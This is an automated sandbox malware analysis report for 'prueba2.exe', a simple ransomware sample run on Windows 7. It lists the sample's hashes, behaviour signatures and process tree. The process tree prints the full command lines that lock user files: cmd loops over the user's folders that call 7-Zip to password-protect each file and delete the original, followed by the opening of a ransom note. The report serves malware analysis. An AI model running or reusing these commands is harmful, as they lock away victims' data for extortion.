be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

Analysis

max time kernel
107s
max time network
74s
platform
windows7_x64
resource
win7v200410
submitted
28/04/2020, 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

prueba2.exe
Size

329KB
MD5

9f5f9c71bb71b8e1571fc4d27721a99e
SHA1

e64de07b46d896d25dc059dd774a140f109364c3
SHA256

be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
SHA512

6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 1116	2040	prueba2.exe	26
PID 2040 wrote to memory of 1116	2040	prueba2.exe	26
PID 2040 wrote to memory of 1116	2040	prueba2.exe	26
PID 2040 wrote to memory of 1004	2040	prueba2.exe	40
PID 2040 wrote to memory of 1004	2040	prueba2.exe	40
PID 2040 wrote to memory of 1004	2040	prueba2.exe	40
PID 2040 wrote to memory of 1704	2040	prueba2.exe	45
PID 2040 wrote to memory of 1704	2040	prueba2.exe	45
PID 2040 wrote to memory of 1704	2040	prueba2.exe	45
PID 2040 wrote to memory of 868	2040	prueba2.exe	49
PID 2040 wrote to memory of 868	2040	prueba2.exe	49
PID 2040 wrote to memory of 868	2040	prueba2.exe	49
PID 2040 wrote to memory of 456	2040	prueba2.exe	50
PID 2040 wrote to memory of 456	2040	prueba2.exe	50
PID 2040 wrote to memory of 456	2040	prueba2.exe	50
PID 2040 wrote to memory of 1800	2040	prueba2.exe	51
PID 2040 wrote to memory of 1800	2040	prueba2.exe	51
PID 2040 wrote to memory of 1800	2040	prueba2.exe	51
PID 2040 wrote to memory of 1768	2040	prueba2.exe	53
PID 2040 wrote to memory of 1768	2040	prueba2.exe	53
PID 2040 wrote to memory of 1768	2040	prueba2.exe	53

Suspicious use of AdjustPrivilegeToken 84 IoCs

description	pid	Process
Token: SeRestorePrivilege	316	7z.exe
Token: 35	316	7z.exe
Token: SeSecurityPrivilege	316	7z.exe
Token: SeSecurityPrivilege	316	7z.exe
Token: SeRestorePrivilege	1128	7z.exe
Token: 35	1128	7z.exe
Token: SeSecurityPrivilege	1128	7z.exe
Token: SeSecurityPrivilege	1128	7z.exe
Token: SeRestorePrivilege	1316	7z.exe
Token: 35	1316	7z.exe
Token: SeSecurityPrivilege	1316	7z.exe
Token: SeSecurityPrivilege	1316	7z.exe
Token: SeRestorePrivilege	624	7z.exe
Token: 35	624	7z.exe
Token: SeSecurityPrivilege	624	7z.exe
Token: SeSecurityPrivilege	624	7z.exe
Token: SeRestorePrivilege	1336	7z.exe
Token: 35	1336	7z.exe
Token: SeSecurityPrivilege	1336	7z.exe
Token: SeSecurityPrivilege	1336	7z.exe
Token: SeRestorePrivilege	1436	7z.exe
Token: 35	1436	7z.exe
Token: SeSecurityPrivilege	1436	7z.exe
Token: SeSecurityPrivilege	1436	7z.exe
Token: SeRestorePrivilege	1476	7z.exe
Token: 35	1476	7z.exe
Token: SeSecurityPrivilege	1476	7z.exe
Token: SeSecurityPrivilege	1476	7z.exe
Token: SeRestorePrivilege	1520	7z.exe
Token: 35	1520	7z.exe
Token: SeSecurityPrivilege	1520	7z.exe
Token: SeSecurityPrivilege	1520	7z.exe
Token: SeRestorePrivilege	1612	7z.exe
Token: 35	1612	7z.exe
Token: SeSecurityPrivilege	1612	7z.exe
Token: SeSecurityPrivilege	1612	7z.exe
Token: SeRestorePrivilege	1624	7z.exe
Token: 35	1624	7z.exe
Token: SeSecurityPrivilege	1624	7z.exe
Token: SeSecurityPrivilege	1624	7z.exe
Token: SeRestorePrivilege	1656	7z.exe
Token: 35	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeSecurityPrivilege	1656	7z.exe
Token: SeRestorePrivilege	1668	7z.exe
Token: 35	1668	7z.exe
Token: SeSecurityPrivilege	1668	7z.exe
Token: SeSecurityPrivilege	1668	7z.exe
Token: SeRestorePrivilege	1664	7z.exe
Token: 35	1664	7z.exe
Token: SeSecurityPrivilege	1664	7z.exe
Token: SeSecurityPrivilege	1664	7z.exe
Token: SeRestorePrivilege	1688	7z.exe
Token: 35	1688	7z.exe
Token: SeSecurityPrivilege	1688	7z.exe
Token: SeSecurityPrivilege	1688	7z.exe
Token: SeRestorePrivilege	792	7z.exe
Token: 35	792	7z.exe
Token: SeSecurityPrivilege	792	7z.exe
Token: SeSecurityPrivilege	792	7z.exe
Token: SeRestorePrivilege	328	7z.exe
Token: 35	328	7z.exe
Token: SeSecurityPrivilege	328	7z.exe
Token: SeSecurityPrivilege	328	7z.exe
Token: SeRestorePrivilege	1692	7z.exe
Token: 35	1692	7z.exe
Token: SeSecurityPrivilege	1692	7z.exe
Token: SeSecurityPrivilege	1692	7z.exe
Token: SeRestorePrivilege	1696	7z.exe
Token: 35	1696	7z.exe
Token: SeSecurityPrivilege	1696	7z.exe
Token: SeSecurityPrivilege	1696	7z.exe
Token: SeRestorePrivilege	1708	7z.exe
Token: 35	1708	7z.exe
Token: SeSecurityPrivilege	1708	7z.exe
Token: SeSecurityPrivilege	1708	7z.exe
Token: SeRestorePrivilege	1720	7z.exe
Token: 35	1720	7z.exe
Token: SeSecurityPrivilege	1720	7z.exe
Token: SeSecurityPrivilege	1720	7z.exe
Token: SeRestorePrivilege	1808	7z.exe
Token: 35	1808	7z.exe
Token: SeSecurityPrivilege	1808	7z.exe
Token: SeSecurityPrivilege	1808	7z.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1736	NOTEPAD.EXE

C:\Users\Admin\AppData\Local\Temp\prueba2.exe
"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:1116
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1316
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:1004
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:792
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:328
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"
    3⤵
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:1704
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"
    3⤵
    PID:1696
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"
    3⤵
    PID:1708
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
  2⤵
  PID:1800
- - C:\PROGRA~1\7-ZIP\7z.exe
    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start README.txt
  2⤵
  PID:1768
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1736

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads